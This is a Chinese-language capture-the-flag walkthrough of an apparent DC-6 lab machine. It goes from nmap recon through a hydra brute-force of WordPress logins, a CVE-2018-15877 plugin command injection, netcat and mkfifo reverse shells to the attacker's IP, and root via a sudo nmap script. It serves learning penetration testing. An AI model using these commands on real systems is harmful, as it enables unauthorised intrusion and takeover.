还是老规矩。使用arp-scan -l查找我们的目标主机
192.168.75.139
使用nmap进一步获取相关信息 nmap -sS -A -p 1-65535 192.168.75.139
开启了80-22两个端口。直接访问80进一步测试
和DC2的靶场有点类似,本地还需要重定向一下、
nano /etc/hosts 或编辑C:\Windows\System32\drivers\etc\hosts
访问成功
使用nmap漏洞扫描脚本nmap --script=vuln 192.168.75.139
跑出来一些奇怪的东西,复制出来,做用户表,然后用hydra爆破?
吧/usr/share/wordlists/rockyou.txt复制出来为passwd.txt
hydra -L user.txt -P passwd.txt wordy http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&rememberne=forever&wp-submit=Log In:S=1'
可得账号,密码为:mark/helpdesk01
发现有Activity monitor,这个模块的tools中的lookup存在CVE-2018-15877远程命令执行漏洞
burpsuit直接反弹shell
nc -lvvp 4444
nc -e /bin/bash 192.168.75.129 4444
根据以往的操作,进入到home目录下。应该有一些奇奇怪怪的东西在里面
cd /home/mark
ls
cat things-to-do.txt
给出了graham的密码,更换账号ssh登陆
ssh graham@192.168.75.139
尝试提权
sudo -l
发现jens账户是无密得,不过ssh是登陆不上去的,但是可以看到jens账户对backups.sh是有权限执行的,也是有写入的权限,所以,尝试在执行此文件时,顺道反弹shell
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| bin/sh -i 2>&1 | nc 192.168.75.129 5555' > backups.sh
sudo -u jens /home/jens/backups.sh
攻击机监听端口5555,获得jens的shell
同样,发现root账户是无密得,但是nmap是有root权限的
写一个nmap的脚本,运行从而获得root权限
echo 'os.execute("/bin/sh")' >root.nse
ls
sudo nmap --script=/home/jens/root.nse
whoami
cd ~
cat theflag.txt
大佬牛逼